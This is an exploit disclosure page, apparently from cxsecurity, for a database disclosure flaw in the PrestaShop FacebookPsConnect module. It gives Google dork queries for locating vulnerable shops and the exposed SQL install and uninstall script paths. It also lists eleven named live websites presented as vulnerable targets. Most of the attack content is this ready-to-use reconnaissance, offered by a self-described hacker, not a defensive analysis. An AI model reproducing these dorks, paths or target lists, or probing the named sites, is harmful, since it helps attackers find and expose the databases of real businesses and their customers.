PrestaShop FacebookPsConnect Modules 1.6.1.4 Database Disclosure

2019.01.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

################################################################################################# # Exploit Title : PrestaShop FacebookPsConnect Modules 1.6.1.4 Database Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 01/01/2019 # Vendor Homepage : prestashop.com ~ businesstech.fr # Software Download Link : modulebazaar.com/prestashop-facebook-connect.html + sourceforge.net/projects/prestashopfacebookconnect/ # Software Installation Price : 50$ # Tested On : Windows and Linux # Category : WebApps # Version Information : 1.4.11.0± ~ 1.5.4.0 ~ 1.5.5.0 ~ 1.5.6.1 ~ 1.5.6.2 ~ 1.6.1.4 ~ 1.6.0.9 # Exploit Risk : Medium # Google Dorks : inurl:''/modules/facebookpsconnect/sql/'' intext:''Fièrement réalisé par Mezcalito'' intext:''Copyright 2018 / PrestaShop. Implented by DGWStudios.com & Design by LeoTheme'' intext:''Copyrights 2012 rygeshop.dk Alle rettigheder forbeholdes'' intext:''© 2018 Powered by Billiandi Creations Ltd™'' intext:''© 2013 - Vinta Quatre. Tous droits réservés - Création Yellow Agence Internet'' intext:''© 2013 oscadi.com™'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] # PacketStormSecurity Exploit Reference Link : packetstormsecurity.com/files/150903/PrestaShop-FacebookPsConnect-1.6.1.4-Database-Disclosure.html ################################################################################################# * PrestaShop FacebookPsConnect Modules Install Uninstall Script Database Disclosure ################################################################################################# # Exploit : /modules/facebookpsconnect/sql/install.sql /modules/facebookpsconnect/sql/uninstall.sql ################################################################################################# # Example Vulnerable Sites => [+] fcgshop.com/modules/facebookpsconnect/sql/install.sql [+] vinta-quatre.com/modules/facebookpsconnect/sql/install.sql [+] poemana.com/catalogue/modules/facebookpsconnect/sql/install.sql [+] lecoindespetits.com/modules/facebookpsconnect/sql/install.sql [+] dimayori.com.gt/modules/facebookpsconnect/sql/install.sql [+] shakarababe.com/modules/facebookpsconnect/sql/ [+] neurodigital.es/store/modules/facebookpsconnect/sql/install.sql [+] rygeshop.dk/modules/facebookpsconnect/sql/install.sql [+] ultimateparisguide.com/registration/modules/facebookpsconnect/sql/install.sql [+] dietanat.com/modules/facebookpsconnect/sql/install.sql [+] margauxlonnberg.com/shop/modules/facebookpsconnect/sql/install.sql ################################################################################################# # Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top